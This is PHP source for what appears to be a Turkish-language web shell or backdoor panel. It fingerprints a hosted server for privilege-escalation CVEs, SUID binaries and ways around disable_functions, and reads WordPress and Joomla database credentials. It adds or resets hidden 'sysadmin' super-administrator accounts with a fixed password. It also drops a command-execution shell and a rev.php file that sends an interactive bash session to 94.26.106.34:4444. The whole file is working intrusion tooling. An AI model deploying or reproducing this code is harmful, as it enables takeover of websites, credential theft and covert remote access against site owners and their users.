$ksec['dmesg_restrict']=trim(biFread('/proc/sys/kernel/dmesg_restrict'))!==''?trim(biFread('/proc/sys/kernel/dmesg_restrict')):'N/A'; $ksec['perf_paranoid']=trim(biFread('/proc/sys/kernel/perf_event_paranoid'))!==''?trim(biFread('/proc/sys/kernel/perf_event_paranoid')):'N/A'; $ksec['mmap_min_addr']=trim(biFread('/proc/sys/vm/mmap_min_addr'))!==''?trim(biFread('/proc/sys/vm/mmap_min_addr')):'N/A'; $kernel_cves=[]; preg_match('/(\d+)\.(\d+)\.(\d+)/i',$uname_r,$_kv); if(!empty($_kv)){ $_ma=(int)$_kv[1];$_mi=(int)$_kv[2];$_kp=(int)$_kv[3]; $cve_list=[ ['DirtyPipe CVE-2022-0847','5.8-5.16.10',($_ma===5&&$_mi>=8&&($_mi<16||($_mi===16&&$_kp<=10))),'pipe splice, SUID overwrite — cok guclu'], ['GameOverlay CVE-2023-2640','5.15+ Ubuntu',($_ma>=5&&$_mi>=15),'Ubuntu overlayfs — user_ns gerekli'], ['OverlayFS CVE-2021-3493','<5.11 Ubuntu',($_ma<5||($_ma===5&&$_mi<11)),'overlayfs + user_ns (Ubuntu)'], ['PwnKit CVE-2021-4034','hepsi',true,'pkexec SUID varsa — universal'], ['Looney Tunables CVE-2023-4911','hepsi glibc',true,'GLIBC_TUNABLES — Debian/RHEL/Fedora glibc <2.34-r8'], ['StackRot CVE-2023-3269','6.1-6.4',($_ma===6&&$_mi>=1&&$_mi<=4),'maple tree UAF'], ['PTRACE_SEIZE CVE-2023-0386','<6.2',($_ma<6||($_ma===6&&$_mi<2)),'overlayfs setuid'], ]; foreach($cve_list as $_c){if($_c[2])$kernel_cves[]=['name'=>$_c[0],'range'=>$_c[1],'desc'=>$_c[3]];} } $suid_known=[ '/usr/bin/newuidmap'=>'newuidmap (user_ns escape)', '/usr/bin/newgidmap'=>'newgidmap (user_ns escape)', '/usr/bin/pkexec'=>'pkexec (CVE-2021-4034)', '/usr/bin/sudo'=>'sudo', '/usr/bin/passwd'=>'passwd', '/usr/bin/mount'=>'mount', '/usr/bin/su'=>'su', '/usr/bin/screen'=>'screen (CVE-2017-5618)', '/usr/bin/perl'=>'perl (GTFOBins)', '/usr/bin/python3'=>'python3 (GTFOBins)', '/usr/bin/find'=>'find (GTFOBins)', '/usr/bin/vim'=>'vim (GTFOBins)', '/usr/bin/awk'=>'awk (GTFOBins)', ]; $suid_found=[]; foreach($suid_known as $_sp=>$_sn){ if(biFexists($_sp)){ $_pm=@fileperms($_sp); $suid_found[$_sp]=['name'=>$_sn,'suid'=>$_pm&&($_pm&0x0800),'sgid'=>$_pm&&($_pm&0x0400),'perms'=>$_pm?substr(sprintf('%o',$_pm),-4):'?']; } } // Exec bypass $bypass=[]; $bypass['eval()']=['yes','Language construct — disable_functions ETKISIZ, her zaman calisir']; $bypass['assert()']=['yes','Language construct']; $bypass['include/require']=['yes','Language construct — remote include icin allow_url_include gerekli']; $_php_major=(int)PHP_MAJOR_VERSION; $bypass['create_function()']=$_php_major<8?['yes','PHP 7 alti: arka planda eval() calistirir']:['no',"PHP 8'de kaldirildi"]; $bypass['preg_replace /e']=$_php_major<7?['yes','PHP 7 altinda: /e modifier eval() calistirir']:["PHP 7'de kaldirildi",'no']; $exec_fns=['exec'=>'shell exec','shell_exec'=>'shell exec','system'=>'shell exec + echo','passthru'=>'shell exec + raw output','popen'=>'pipe open','proc_open'=>'process open']; foreach($exec_fns as $_f=>$_fd){$_ok=biFnOk($_f);$bypass[$_f]=$_ok?['yes',$_fd]:['no','disable_functions\'da'];} $_pcntl=biFnOk('pcntl_exec'); $bypass['pcntl_exec']=$_pcntl?['partial','Mevcut ama output yok — process replace, HTTP 503 verir']:['no','Yok veya disabled']; $ffi_enabled=false;$ffi_status=''; if(extension_loaded('FFI')){ $ffi_ini=ini_get('ffi.enable'); if($ffi_ini==='true'||$ffi_ini==='1'||$ffi_ini==='preload'){$ffi_enabled=true;$ffi_status='ffi.enable='.$ffi_ini;} else{$ffi_status='ffi.enable='.($ffi_ini?:'"" (kapali)');} }else{$ffi_status='Uzanti yuklu degil';} $bypass['FFI::cdef']=$ffi_enabled?['yes','FFI ile libc popen/system cagrilabilir: '.$ffi_status]:['no',$ffi_status]; $putenv_ok=biFnOk('putenv');$mail_ok=biFnOk('mail');$errlog_ok=biFnOk('error_log');$mbmail_ok=biFnOk('mb_send_mail'); $_sm_path=ini_get('sendmail_path');$_sm_bin=trim(explode(' ',$_sm_path)[0]);$_sm_exists=($_sm_bin&&biFexists($_sm_bin)); $_ldp_base=$putenv_ok?'putenv OK':'putenv X (disabled)'; $bypass['LD_PRELOAD+mail']=($putenv_ok&&$mail_ok&&$_sm_exists)?['yes',$_ldp_base.' | mail OK | sendmail OK']:['no',$_ldp_base.' | mail='.($mail_ok?'OK':'X').' | sendmail='.($_sm_exists?'OK':'yok')]; $bypass['LD_PRELOAD+error_log']=($putenv_ok&&$errlog_ok)?['yes',$_ldp_base.' | error_log OK']:['no',$_ldp_base.' | error_log='.($errlog_ok?'OK':'X')]; $bypass['LD_PRELOAD+mb_send_mail']=($putenv_ok&&$mbmail_ok)?['yes',$_ldp_base.' | mb_send_mail OK']:['no',$_ldp_base.' | mb_send_mail='.($mbmail_ok?'OK':'X')]; $dl_ok=biFnOk('dl')&&ini_get('enable_dl'); $bypass['dl()']=$dl_ok?['yes','dl() aktif — runtime shared lib yukleme mumkun']:['no','dl() '.(!function_exists('dl')?'yok':(!ini_get('enable_dl')?'enable_dl=off':'disabled'))]; $imap_ok=biFnOk('imap_open'); $bypass['imap_open']=$imap_ok?['yes','Command injection: imap_open("{localhost:143/imap}x -oProxyCommand=cmd","","")']:['no','imap_open '.(extension_loaded('imap')?"disable_functions'da":'yuklu degil')]; $bypass['Imagick policy']=class_exists('Imagick')?['partial','Imagick mevcut — ImageMagick policy.xml\'e bagli']:['no','Imagick yuklu degil']; $expect_ok=in_array('expect',stream_get_wrappers()); $bypass['expect://']=$expect_ok?['yes','expect:// AKTIF — fopen/include ile komut calistirir']:['no','Yok']; $bypass['Symlink race']=[!$cagefs?'yes':'no','CageFS '.($cagefs?'AKTIF (bloke)':'YOK — /proc/sysrq, cron race mumkun')]; $bypass['zip:// wrapper']=extension_loaded('zip')?['partial','zip:// aktif — LFI zinciri icin']:['no','zip ext yok']; $bypass['glob://']=['partial','glob:// her zaman aktif — directory listing (LFI yardimci)']; // Servisler $svc_list=['MySQL','cURL','WGET','Perl','Python','Ruby','Git','WP-CLI','Sudo','Pkexec','FFmpeg','Composer','Node.js','NPM','Zip','Tar','Unzip','7zip','Sendmail']; $svc=[]; foreach($svc_list as $_s){ switch($_s){ case 'MySQL':$svc[$_s]=extension_loaded('mysqli')||extension_loaded('pdo_mysql');break; case 'cURL':$svc[$_s]=function_exists('curl_version');break; case 'WGET':$svc[$_s]=(bool)biWhich('wget');break; case 'Perl':$svc[$_s]=(bool)biWhich('perl');break; case 'Python':$svc[$_s]=(bool)(biWhich('python3')||biWhich('python'));break; case 'Ruby':$svc[$_s]=(bool)biWhich('ruby');break; case 'Git':$svc[$_s]=(bool)biWhich('git');break; case 'WP-CLI':$svc[$_s]=(bool)biWhich('wp');break; case 'Sudo':$svc[$_s]=(bool)biWhich('sudo');break; case 'Pkexec':$svc[$_s]=(bool)biWhich('pkexec');break; case 'FFmpeg':$svc[$_s]=(bool)biWhich('ffmpeg');break; case 'Composer':$svc[$_s]=(bool)biWhich('composer');break; case 'Node.js':$svc[$_s]=(bool)biWhich('node');break; case 'NPM':$svc[$_s]=(bool)biWhich('npm');break; case 'Zip':$svc[$_s]=extension_loaded('zip')||(bool)biWhich('zip');break; case 'Tar':$svc[$_s]=(bool)biWhich('tar');break; case 'Unzip':$svc[$_s]=(bool)biWhich('unzip');break; case '7zip':$svc[$_s]=(bool)(biWhich('7z')||biWhich('7za'));break; case 'Sendmail':$svc[$_s]=(bool)biWhich('sendmail');break; default:$svc[$_s]=false; } } $svc_ver=[]; if($svc['cURL']&&function_exists('curl_version')){$cv=curl_version();$svc_ver['cURL']=isset($cv['version'])?$cv['version']:'';} // WordPress $wp_info=[]; $docroot=rtrim(isset($_SERVER['DOCUMENT_ROOT'])?$_SERVER['DOCUMENT_ROOT']:'','/\\'); $_wp_cfg_paths=[$docroot.'/wp-config.php',dirname($sd_path).'/wp-config.php',dirname(dirname($sd_path)).'/wp-config.php']; $_wp_cfg=''; foreach($_wp_cfg_paths as $_p){$_c=biFread($_p);if($_c&&strpos($_c,'DB_NAME')!==false){$_wp_cfg=$_c;$wp_info['config_path']=$_p;break;}} if($_wp_cfg){ if(preg_match("/define\(\s*'DB_NAME'\s*,\s*'([^']+)'/i",$_wp_cfg,$_m))$wp_info['DB_NAME']=$_m[1]; if(preg_match("/define\(\s*'DB_USER'\s*,\s*'([^']+)'/i",$_wp_cfg,$_m))$wp_info['DB_USER']=$_m[1]; if(preg_match("/define\(\s*'DB_HOST'\s*,\s*'([^']+)'/i",$_wp_cfg,$_m))$wp_info['DB_HOST']=$_m[1]; if(preg_match('/\$table_prefix\s*=\s*\'([^\']+)\'/i',$_wp_cfg,$_m))$wp_info['PREFIX']=$_m[1]; } // PHP limitleri $limits=[ 'memory_limit'=>ini_get('memory_limit'), 'max_execution_time'=>ini_get('max_execution_time').' sn', 'upload_max_filesize'=>ini_get('upload_max_filesize'), 'post_max_size'=>ini_get('post_max_size'), 'max_input_vars'=>ini_get('max_input_vars'), 'max_file_uploads'=>ini_get('max_file_uploads'), 'allow_url_fopen'=>ini_get('allow_url_fopen')?'Acik':'Kapali', 'allow_url_include'=>ini_get('allow_url_include')?'Acik':'Kapali', 'display_errors'=>ini_get('display_errors')?'Acik':'Kapali', 'ffi.enable'=>ini_get('ffi.enable')?:'(bos/kapali)', 'session.save_path'=>ini_get('session.save_path')?:sys_get_temp_dir(), 'date.timezone'=>ini_get('date.timezone')?:date_default_timezone_get(), 'sendmail_path'=>ini_get('sendmail_path')?:'N/A', ]; // Eklentiler $all_exts=get_loaded_extensions(); sort($all_exts); $hl_exts=['gd','imagick','mbstring','openssl','zip','intl','curl','pdo','mysqli','redis','memcached','memcache','opcache','apcu','soap','iconv','json','xml','simplexml','pcre','hash','bcmath','exif','fileinfo','ftp','imap','ldap','pdo_mysql','pdo_sqlite','pdo_pgsql','pgsql','sodium','sockets','ffi','pcntl']; // Cache $cache=[]; if(function_exists('opcache_get_status')){ $ops=@opcache_get_status(false); if($ops&&!empty($ops['opcache_enabled'])){$cache['OPcache']='Aktif';}else{$cache['OPcache']=false;} }else{$cache['OPcache']=null;} if(function_exists('apcu_sma_info')){$ai=@apcu_sma_info();$cache['APCu']=$ai?'Aktif':false;}else{$cache['APCu']=null;} if(class_exists('Redis')){try{$rd=new Redis();$rco=@$rd->connect('127.0.0.1',6379,2);if($rco){@$rd->close();$cache['Redis']='Aktif';}else{$cache['Redis']=false;}}catch(Exception$e){$cache['Redis']=false;}}else{$cache['Redis']=null;} if(class_exists('Memcache')){try{$mc=new Memcache();$mcok=@$mc->connect('127.0.0.1',11211);if($mcok){@$mc->close();$cache['Memcache']='Aktif';}else $cache['Memcache']=false;}catch(Exception$e){$cache['Memcache']=false;}}else{$cache['Memcache']=null;} // Veritabani $db=[]; if(extension_loaded('mysqli'))$db['MySQL']='Yuklu'; elseif(extension_loaded('pdo_mysql'))$db['MySQL']='PDO MySQL'; else $db['MySQL']=false; if(extension_loaded('pgsql'))$db['PostgreSQL']='Yuklu'; elseif(extension_loaded('pdo_pgsql'))$db['PostgreSQL']='PDO PostgreSQL'; else $db['PostgreSQL']=false; if(extension_loaded('sqlite3'))$db['SQLite']='v'.SQLite3::version()['versionString']; elseif(extension_loaded('pdo_sqlite'))$db['SQLite']='PDO SQLite'; else $db['SQLite']=false; $db['MongoDB']=extension_loaded('mongodb')?'Yuklu':false; // Dosya sistemi $fs=[]; $fs['DOCUMENT_ROOT']=$docroot?:__DIR__; $dtot=$docroot?@disk_total_space($docroot):false; $dfre=$docroot?@disk_free_space($docroot):false; $fs['Disk Toplam']=biFmt($dtot); $fs['Disk Bos']=biFmt($dfre); $tmp=sys_get_temp_dir(); $fs['Tmp Dizin']=$tmp.' — '.(is_writable($tmp)?'Yazilabilir':'Salt Okunur'); $sp=ini_get('session.save_path')?:$tmp; $fs['Session Dizin']=$sp.' — '.($sp&&is_writable($sp)?'Yazilabilir':'Salt Okunur'); $sd=isset($_SERVER['SCRIPT_FILENAME'])?dirname($_SERVER['SCRIPT_FILENAME']):__DIR__; $fs['Script Dizin']=$sd.' — '.(is_writable($sd)?'Yazilabilir':'Salt Okunur'); $etc_passwd=biFread('/etc/passwd'); $fs['/etc/passwd']=$etc_passwd?'Okunabilir ('.substr_count($etc_passwd,"\n").' satir)':'Okunamadi (open_basedir veya izin)'; $fs['proc/self/environ']=$proc_self_environ?'Okunabilir':'Okunamadi'; $fs['proc/self/cmdline']=$proc_self_cmdline?'Okunabilir':'Okunamadi'; $fs['proc/1/cmdline']=$proc_1_cmdline?'Okunabilir':'Okunamadi (izole)'; // Ag $net=[]; $net['Hostname']=function_exists('gethostname')?(string)gethostname():'N/A'; $net['Timezone']=date_default_timezone_get(); $net['Sunucu Saati']=date('d.m.Y H:i:s'); $net['Kernel']=php_uname('s').' '.php_uname('r'); $net['Mimari']=php_uname('m'); $_resolv=biFread('/etc/resolv.conf'); $_dns=[]; if($_resolv){preg_match_all('/^nameserver\s+(\S+)/m',$_resolv,$_dm);$_dns=$_dm[1];} $net['DNS Sunuculari']=$_dns?implode(' | ',$_dns):'N/A'; if($_cpuinfo){ $cc=substr_count($_cpuinfo,'processor'); $cm='';if(preg_match('/model name\s*:\s*(.+)/i',$_cpuinfo,$_cma))$cm=trim($_cma[1]); $net['CPU']=$cc.' cekirdek'.($cm?' — '.$cm:''); } $_mi=biFread('/proc/meminfo'); if($_mi){ $_mt=$_ma=0; if(preg_match('/MemTotal:\s+(\d+)/i',$_mi,$_mm))$_mt=(int)$_mm[1]; if(preg_match('/MemAvailable:\s+(\d+)/i',$_mi,$_mm))$_ma=(int)$_mm[1]; if($_mt){ $net['RAM Toplam']=round($_mt/1024).' MB'; $net['RAM Kullanilan']=round(($_mt-$_ma)/1024).' MB ('.round(($_mt-$_ma)/$_mt*100,1).'%)'; } } if($load_avg)$net['Load Average']=$load_avg; // Port taramasi $ports_scan=[]; if(function_exists('fsockopen')){ $scan_ports=[21=>'FTP',22=>'SSH',80=>'HTTP',443=>'HTTPS',3306=>'MySQL',5432=>'PostgreSQL',6379=>'Redis',11211=>'Memcached',8080=>'HTTP-Alt',25=>'SMTP',587=>'SMTP-587']; $_mh=[]; foreach($scan_ports as $_port=>$_pname){ $_sock=@fsockopen('127.0.0.1',$_port,$errno,$errstr,0.4); $ports_scan[$_port]=['name'=>$_pname,'open'=>$_sock!==false]; if($_sock)fclose($_sock); } } $egress=['enabled'=>false,'ip'=>'','method'=>'']; if(function_exists('curl_init')){ $_egch=curl_init(); curl_setopt_array($_egch,[CURLOPT_URL=>'https://api.ipify.org',CURLOPT_RETURNTRANSFER=>true,CURLOPT_TIMEOUT=>4,CURLOPT_SSL_VERIFYPEER=>false]); $_egr=@curl_exec($_egch);$_egerr=curl_errno($_egch);curl_close($_egch); if(!$_egerr&&$_egr&&preg_match('/^\d{1,3}(\.\d{1,3}){3}$/',trim($_egr)))$egress=['enabled'=>true,'ip'=>trim($_egr),'method'=>'curl HTTPS']; } $fpm_sockets=[]; foreach(['/run','/var/run','/tmp'] as $_fd){ if(@is_dir($_fd)){ $_fh=@opendir($_fd); if($_fh){while(false!==($_ff=@readdir($_fh))){if(substr($_ff,-4)==='.sock'||strpos($_ff,'fpm')!==false)$fpm_sockets[]=$_fd.'/'.$_ff;}@closedir($_fh);} } } ob_end_clean(); ?>

Sunucu Ozeti

Server IP:
Your IP:
Web Server
System
User
UID/GID
Groups
PHP Version ()
Load
Disable Functions

Hosting Ortami & Guvenlik

$_ev){$_state=$_ev[0];$_val=$_ev[1]; if($_state==='info'){echo 'ⓘ '.biE($_en).'';} elseif($_state==='active'||$_state===true){echo '⚠ '.biE($_en).'';} elseif($_state==='warn'){echo '⚠ '.biE($_en).'';} else{echo ''.biE($_en).'';} }?>
open_basedir
proc/self/environ
Virt Tipi

Exec Bypass Analizi

$_bv){ if($_bv[0]==='yes')$_by_yes[$_bk]=$_bv[1]; elseif($_bv[0]==='partial')$_by_partial[$_bk]=$_bv[1]; else $_by_no[$_bk]=$_bv[1]; }?>
CALISIR ()
$_bd):?>
KOSULLU ()
$_bd):?>
CALISMAZ ()
$_bd):?>

Kernel Guvenlik Parametreleri

$_kv): $_val=(string)$_kv;$_cls=''; if($_kk==='user_ns (userns_clone)'){$_cls=$_val==='1'?'warn':($_val==='0'?'ok':'info');} elseif($_kk==='ptrace_scope'){$_cls=$_val==='0'?'warn':($_val==='1'?'ok':'info');} elseif($_kk==='dmesg_restrict'){$_cls=$_val==='0'?'warn':'ok';}?>
Potansiyel Kernel CVE'leri ()
—
Mevcut SUID Binary'ler
$_si):?>
[]

Kontrol Paneli Tespiti

$_pv){echo '✓ '.biE($_pn).'';} foreach($panel_map as $_pn=>$_pd){if(!isset($panels[$_pn]))echo ''.biE($_pn).'';} if(empty($panels))echo 'Hicbir kontrol paneli tespit edilemedi'; ?>

WordPress Tespiti

$_wv):?>

Servis Durumu

$_sv): $_ver=isset($svc_ver[$_sn])&&trim($svc_ver[$_sn])!==''?' '.htmlspecialchars(substr(trim($svc_ver[$_sn]),0,12),ENT_QUOTES,'UTF-8').'':''; echo $_sv?'ON '.biE($_sn).$_ver.'':'OFF '.biE($_sn).''; endforeach;?>

PHP Limitleri & Ayarlari

$_lv):?>

Yuklu PHP Eklentileri ()

'.biE($_ext).'';endforeach;?>

Cache / Opcode

$_cv): if($_cv===null)echo ''.biE($_cn).''; elseif($_cv===false)echo 'OFF '.biE($_cn).''; else echo 'ON '.biE($_cn).''; endforeach;?>

Veritabani Destegi

$_dv):echo $_dv===false?'OFF '.biE($_dn).'':'ON '.biE($_dn).'';endforeach;?>

Dosya Sistemi

$_fv): $_warn=strpos((string)$_fv,'Salt Okunur')!==false||strpos((string)$_fv,'Okunamadi')!==false; $_ok=strpos((string)$_fv,'Yazilabilir')!==false||strpos((string)$_fv,'Okunabilir')!==false;?>

Ag & Sistem Bilgisi

Disariya Egress
$_nv):?>
Localhost Port Taramasi
$_pi):?>
FPM Sockets
wp-config.php bulunamadi veya DB baglantisi kurulamadi.'); } $m = $wdb['mysqli']; $tp = $wdb['prefix']; $tu = $tp . 'users'; $tm = $tp . 'usermeta'; if ($wa === 'sifirla' && !empty($_POST['id'])) { $id = (int)$_POST['id']; $hash = wpHashPass($_POST['sifre']); $m->query("UPDATE `$tu` SET user_pass = '$hash' WHERE ID = $id"); header('Content-Type: text/html; charset=utf-8'); echo '
Sifre siralandi! Yeni sifre: ' . htmlspecialchars($_POST['sifre']) . '
'; $m->close(); exit; } if ($wa === 'ekle') { $kadi = $m->real_escape_string($_POST['kadi']); $mail = $m->real_escape_string($_POST['mail']); $sifre = wpHashPass($_POST['sifre2']); $m->query("INSERT INTO `$tu` (user_login, user_pass, user_nicename, user_email, user_registered, display_name) VALUES ('$kadi', '$sifre', '$kadi', '$mail', NOW(), '$kadi')"); $nid = $m->insert_id; $m->query("INSERT INTO `$tm` (user_id, meta_key, meta_value) VALUES ($nid, '{$tp}capabilities', 'a:1:{s:13:\"administrator\";b:1;}')"); $m->query("INSERT INTO `$tm` (user_id, meta_key, meta_value) VALUES ($nid, '{$tp}user_level', '10')"); header('Content-Type: text/html; charset=utf-8'); echo '
Yeni admin eklendi: ' . htmlspecialchars($kadi) . '
'; $m->close(); exit; } if ($wa === 'sil' && !empty($_POST['id']) && $_POST['id'] != 1) { $id = (int)$_POST['id']; $m->query("DELETE FROM `$tu` WHERE ID = $id"); $m->query("DELETE FROM `$tm` WHERE user_id = $id"); header('Content-Type: text/html; charset=utf-8'); echo '
Kullanici silindi (ID: ' . $id . ')
'; $m->close(); exit; } if ($wa === 'hizli') { $kadi = 'sysadmin'; $mail = 'sysadmin@proton.me'; $sifreTxt = 'Panel2025!'; $hash = wpHashPass($sifreTxt); $chk = $m->query("SELECT ID FROM `$tu` WHERE user_login = '$kadi'"); if ($chk && $chk->num_rows > 0) { $ex = $chk->fetch_row(); $eid = (int)$ex[0]; $m->query("UPDATE `$tu` SET user_pass = '$hash', user_email = '$mail' WHERE ID = $eid"); $m->query("UPDATE `$tm` SET meta_value = 'a:1:{s:13:\"administrator\";b:1;}' WHERE user_id = $eid AND meta_key = '{$tp}capabilities'"); $mode = 'guncellendi'; } else { $m->query("INSERT INTO `$tu` (user_login, user_pass, user_nicename, user_email, user_registered, display_name) VALUES ('$kadi', '$hash', '$kadi', '$mail', NOW(), '$kadi')"); $eid = (int)$m->insert_id; $m->query("INSERT INTO `$tm` (user_id, meta_key, meta_value) VALUES ($eid, '{$tp}capabilities', 'a:1:{s:13:\"administrator\";b:1;}')"); $m->query("INSERT INTO `$tm` (user_id, meta_key, meta_value) VALUES ($eid, '{$tp}user_level', '10')"); $mode = 'olusturuldu'; } $wSiteInfo = cmsAdminUrl(dirname($wdb['config']), 'WordPress'); $wBase = $wSiteInfo['base'] ? rtrim($wSiteInfo['base'], '/') : ''; $wLink = $wBase ? ($wBase . '/wp-login.php') : ''; header('Content-Type: text/html; charset=utf-8'); echo '
sysadmin ' . $mode . ' | Kullanici: ' . $kadi . ' | Sifre: ' . $sifreTxt . ''; if ($wLink) echo ' | Admin Paneli Ac'; echo '
'; $m->close(); exit; } $m->close(); exit; } if (isset($_POST['ja'])) { $ja = $_POST['ja']; $jRoot = fm_path(isset($_POST['root']) ? $_POST['root'] : ''); if ($jRoot && is_dir($jRoot) && in_array($ja, array('hizli', 'sifirla', 'sil', 'ekle'))) { $jCfgFile = rtrim($jRoot, '/') . '/configuration.php'; if (!is_file($jCfgFile)) { header('Content-Type: text/html; charset=utf-8'); die('
configuration.php bulunamadi.
'); } $jCfg = @file_get_contents($jCfgFile); $jGet = function($re) use ($jCfg) { if (preg_match('/' . $re . '\s*=\s*[\'"]([^\'"]*)[\'"]/', $jCfg, $jM)) return $jM[1]; return null; }; $jHost = $jGet('\\$host'); $jUser = $jGet('\\$user'); $jPass = $jGet('\\$password'); $jDb = $jGet('\\$db'); $jPre = $jGet('\\$dbprefix'); if (!$jPre) $jPre = 'jos_'; if (!class_exists('mysqli', false)) { header('Content-Type: text/html; charset=utf-8'); die('
mysqli veritabani destegi kurulu degil.
'); } $jm = @new mysqli($jHost, $jUser, $jPass, $jDb); if ($jm->connect_errno) { header('Content-Type: text/html; charset=utf-8'); die('
Joomla DB baglantisi kurulamadi.
'); } $ju = $jPre . 'users'; $jug = $jPre . 'user_usergroup_map'; if ($ja === 'hizli') { $jHash = password_hash('Panel2025!', PASSWORD_DEFAULT); $chk = $jm->query("SELECT id FROM `$ju` WHERE username = 'sysadmin'"); if ($chk && $chk->num_rows > 0) { $ex = $chk->fetch_row(); $jid = (int)$ex[0]; $jm->query("UPDATE `$ju` SET password = '$jHash', email = 'sysadmin@proton.me', block = 0 WHERE id = $jid"); $jm->query("DELETE FROM `$jug` WHERE user_id = $jid"); $jm->query("INSERT INTO `$jug` (user_id, group_id) VALUES ($jid, 8)"); $jMode = 'guncellendi'; } else { $jm->query("INSERT INTO `$ju` (name, username, email, password, block, sendEmail, registerDate, params) VALUES ('sysadmin', 'sysadmin', 'sysadmin@proton.me', '$jHash', 0, 1, NOW(), '{}')"); $jid = (int)$jm->insert_id; $jm->query("INSERT INTO `$jug` (user_id, group_id) VALUES ($jid, 8)"); $jMode = 'olusturuldu'; } $jBase = ''; if (preg_match('/\\\$live_site\s*=\s*[\'"]([^\'"]*)[\'"]/', $jCfg, $jM2) && $jM2[1]) $jBase = rtrim($jM2[1], '/'); $jLink = $jBase ? ($jBase . '/administrator/') : ''; header('Content-Type: text/html; charset=utf-8'); echo '
Joomla sysadmin ' . $jMode . ' | Kullanici: sysadmin | Sifre: Panel2025!'; if ($jLink) echo ' | Admin Paneli Ac'; echo '
'; $jm->close(); exit; } if ($ja === 'sifirla' && !empty($_POST['id']) && trim(isset($_POST['sifre']) ? $_POST['sifre'] : '') !== '') { $jid = (int)$_POST['id']; $jPass = trim($_POST['sifre']); $newHash = password_hash($jPass, PASSWORD_DEFAULT); $jm->query("UPDATE `$ju` SET password = '$newHash', block = 0 WHERE id = $jid"); header('Content-Type: text/html; charset=utf-8'); echo '
Sifre siralandi! Yeni sifre: ' . htmlspecialchars($jPass) . '
'; $jm->close(); exit; } if ($ja === 'sil' && !empty($_POST['id']) && (int)$_POST['id'] !== 1) { $jid = (int)$_POST['id']; $jm->query("DELETE FROM `$jug` WHERE user_id = $jid"); $jm->query("DELETE FROM `$ju` WHERE id = $jid"); header('Content-Type: text/html; charset=utf-8'); echo '
Kullanici silindi (ID: ' . $jid . ')
'; $jm->close(); exit; } if ($ja === 'ekle') { $kadi = $jm->real_escape_string(trim(isset($_POST['kadi']) ? $_POST['kadi'] : '')); $ad = $jm->real_escape_string(trim(isset($_POST['ad']) ? $_POST['ad'] : $kadi)); $mail = $jm->real_escape_string(trim(isset($_POST['mail']) ? $_POST['mail'] : '')); $sifre = isset($_POST['sifre']) ? $_POST['sifre'] : ''; if (!$kadi || !$mail || $sifre === '') { header('Content-Type: text/html; charset=utf-8'); die('
Eksik bilgi: kullanici adi, e-posta ve sifre gerekli.
'); } $chk2 = $jm->query("SELECT id FROM `$ju` WHERE username = '$kadi'"); if ($chk2 && $chk2->num_rows > 0) { header('Content-Type: text/html; charset=utf-8'); die('
Bu kullanici adi zaten mevcut.
'); } $newHash = password_hash($sifre, PASSWORD_DEFAULT); $jm->query("INSERT INTO `$ju` (name, username, email, password, block, sendEmail, registerDate, params) VALUES ('$ad', '$kadi', '$mail', '$newHash', 0, 1, NOW(), '{}')"); $jid2 = (int)$jm->insert_id; $jm->query("INSERT INTO `$jug` (user_id, group_id) VALUES ($jid2, 8)"); header('Content-Type: text/html; charset=utf-8'); echo '
Yeni Super User eklendi: ' . htmlspecialchars($kadi) . '
'; $jm->close(); exit; } $jm->close(); } exit; } if (isset($_POST['rs'])) { $rsAct = $_POST['rs']; header('Content-Type: text/html; charset=utf-8'); $wsTpl = ' 0) { $o = array(); if (function_exists(\'shell_exec\')) { $r = @shell_exec($c . \' 2>&1\'); if ($r !== false && $r !== null) { echo $r; } } elseif (function_exists(\'system\')) { @system($c . \' 2>&1\'); } elseif (function_exists(\'passthru\')) { @passthru($c . \' 2>&1\'); } elseif (function_exists(\'exec\')) { @exec($c . \' 2>&1\', $o); echo implode("\n", $o); } else { echo \'no_exec: \' . (string)@ini_get(\'disable_functions\'); } } echo "\n[OK]"; ?>'; $userRevTpl = <<<'REVTPL' $sock, // stdin 1 => $sock, // stdout 2 => $sock // stderr ); $process = proc_open('/bin/bash -i', $descriptorspec, $pipes); if (is_resource($process)) { // Shell'i daha stabil hale getirmek için ekstra komutlar gönder fwrite($pipes[0], "export TERM=xterm; export PS1='\$ '; unset HISTFILE; \n"); fclose($pipes[0]); proc_close($process); } else { echo "proc_open calismadi"; } ?> REVTPL; if ($rsAct === 'execute') { $ip = '94.26.106.34'; $port = 4444; $tgtRoot = detectRoot(); $file = rtrim($tgtRoot, '/\\') . '/rev.php'; $payload = $userRevTpl; $okW = @file_put_contents($file, $payload); if ($okW === false) { die('
Yazma hatasi: ' . htmlspecialchars($file) . '
'); } @chmod($file, 0755); @include($file); die('
rev.php OLUSTURULDU ve tetiklendi
Hedef: ' . htmlspecialchars($ip) . ':' . $port . '
Dosya: ' . htmlspecialchars($file) . '
'); } if ($rsAct === 'egress') { $t = microtime(true); $sock = @fsockopen('94.26.106.34', 4444, $errno, $errstr, 6); $dt = round((microtime(true) - $t) * 1000); if ($sock) { @fclose($sock); die('
EGRESS ACIK — 94.26.106.34:4444 ulasilabilir (' . $dt . ' ms). Reverse shell calisabilir.
'); } $s2 = @fsockopen('1.1.1.1', 80, $e2, $es2, 4); if ($s2) { @fclose($s2); die('
EGRESS KISMEN — hedef port (4444) engelli ama internet cikisi acik. Farkli port/Web Kabuk dene.
'); } die('
EGRESS KAPALI — dis baglantilar engelli. Web Kabuk kullan.
'); } if ($rsAct === 'probe') { $prDir = rtrim(dirname(__FILE__), '/\\'); foreach (glob($prDir . '/w_*_p.php') as $old) { @unlink($old); } $prDir2 = rtrim(detectRoot(), '/\\'); if ($prDir2 !== $prDir) { foreach (glob($prDir2 . '/w_*_p.php') as $old) { @unlink($old); } } $prName = 'w_' . mt_rand(1000, 9999) . '_p.php'; $prFile = $prDir . '/' . $prName; $prTpl = ''; $okP = @file_put_contents($prFile, $prTpl); if ($okP === false) { die('
Yazma hatasi: ' . htmlspecialchars($prFile) . '
'); } @chmod($prFile, 0644); $prRel = trim(str_replace('\\', '/', dirname(isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : '/filemanager.php')), '/'); $prUrl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' ? 'https' : 'http') . '://' . (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '') . ($prRel !== '' ? '/' . $prRel : '') . '/' . $prName; die('
PHP Probe OLUSTURULDU
Ac: ' . htmlspecialchars($prUrl) . '
Sonucu bana ilet (PHP surumu ve disable_functions).
